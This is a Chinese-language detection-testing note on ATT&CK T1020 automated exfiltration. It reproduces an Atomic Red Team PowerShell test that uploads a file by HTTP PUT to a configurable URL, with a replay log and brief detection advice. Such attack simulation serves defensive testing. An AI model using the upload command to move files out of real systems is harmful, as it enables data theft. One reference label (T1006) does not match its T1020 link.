跳转至

T1020-win-自动渗出

来自ATT&CK的描述

攻击者可能会在收集期间通过使用自动处理来渗出数据,例如敏感文件。

当使用自动渗出时,其他渗出技术可能也适用于将信息转移出网络,如通过C2通道渗出和通过替代协议渗出。

测试案例

IcedID Botnet HTTP PUT

创建一个文本文件,试图通过带有ContentType Header的HTTP PUT方法上传到服务器上,删除一个创建的文件

攻击命令,请使用Powershell执行:

$fileName = "#{file}"
$url = "#{domain}"
$file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
$contentType = "application/octet-stream"
try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}

file:C:\Users\zhuli\Desktop\TevoraAutomatedRTGui\atomic-red-team-master\atomics\T1020\test.txt domain:https://google.com

删除命令:

$fileName = "#{file}"
Remove-Item -Path $fileName -ErrorAction Ignore

检测日志

暂无,经过本地复现,Windows安全日志、Sysmon日志未记录到此命令的执行情况。实际上Windows Powershell日志可能会记录相关操作记录。

测试复现

测试1 IcedID Botnet HTTP PUT

PS C:\Users\zhuli> $fileName = "C:\Users\zhuli\Desktop\TevoraAutomatedRTGui\atomic-red-team-master\atomics\T1020\test.txt"
PS C:\Users\zhuli> $url = "https://google.com"
PS C:\Users\zhuli> $fileName = "C:\Users\zhuli\Desktop\TevoraAutomatedRTGui\atomic-red-team-master\atomics\T1020\test.txt"
PS C:\Users\zhuli> $url = "https://google.com"
PS C:\Users\zhuli> $file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
PS C:\Users\zhuli> $contentType = "application/octet-stream"
PS C:\Users\zhuli> try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}

PS C:\Users\zhuli> $fileName = "C:\Users\zhuli\Desktop\TevoraAutomatedRTGui\atomic-red-team-master\atomics\T1020\test.txt"
PS C:\Users\zhuli> Remove-Item -Path $fileName -ErrorAction Ignore

Windows Server 2019测试失败,根据报错信息来看,主要问题在domain位置。

日志留痕

暂无

检测规则/思路

建议

监控进程文件访问模式和网络行为。未被识别的进程或脚本如果看起来在遍历文件系统或发送网络流量,是很可疑的行为。

参考推荐

MITRE-ATT&CK-T1020

https://attack.mitre.org/techniques/T1020

Atomic-red-team-T1006

https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1020